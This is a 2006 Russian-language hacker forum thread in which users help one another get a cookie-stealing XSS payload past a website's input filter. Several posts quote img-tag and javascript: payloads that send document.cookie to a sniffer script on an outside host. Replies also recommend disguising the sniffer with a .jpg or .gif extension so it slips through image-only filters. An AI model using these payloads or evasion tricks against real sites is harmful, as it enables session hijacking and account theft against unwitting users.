Обойти фильтрацию!

Discussion in 'Уязвимости' started by Utochka, 31 Jan 2006.

  1. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Подскажите как обойти следующую фильтрацию:

    До фильтрации:
    <img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

    или
    <img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

    После фильтрации:

    <img src=/'http://store-room.h15.ru/sniff/sniff.php?/'+document.cookie></img>

    Как бы это обойти?
     
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    мдя.... имхо тебе этот код ничего не даст. Надо чтобы текст интерпритировался браузером как ЯваКод. А тут просто адрес. И на снифф тебе придет ИП, реферер, а вместо кук document.cookie
     
  3. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Мдя....эт точно!

    Сниффер возвращает браузеру прозрачный GIF-файл размером 1x1 px. Это позволяет вызывать сниффер как непосредственно по ссылке в теге <a>, так и в качестве src тега <img>. Сам сниффер имеет расширение .jpg, что позволяет использовать его в обход фильтров, пропускающих только адреса картинок. А у тебя что??
    расширения php. Так не получется или я что то не так понял...щас не могу думать голова забита (
     
  4. pch

    pch Elder - Старейшина

    Joined:
    22 Oct 2005
    Messages:
    34
    Likes Received:
    41
    Reputations:
    15
    Попробуй
    Code:
    <img  src=javascript:aa=new Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>
    
     
  5. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    че то не сработало =( Дай свою асю, поговорить надо.
     
  6. Xxor

    Xxor Elder - Старейшина

    Joined:
    24 Jan 2006
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Юзай античатовский снифер он с расшырением .gif должно пропустить
     
  7. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Короче теперь такая трабла, вроде обошел фильтрацию вот этим:

    <img src=javascript:aa=new Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

    но он не хочет выполняться =( куки не приходят =(. Также пробовал с античатовским снифером ни хрена!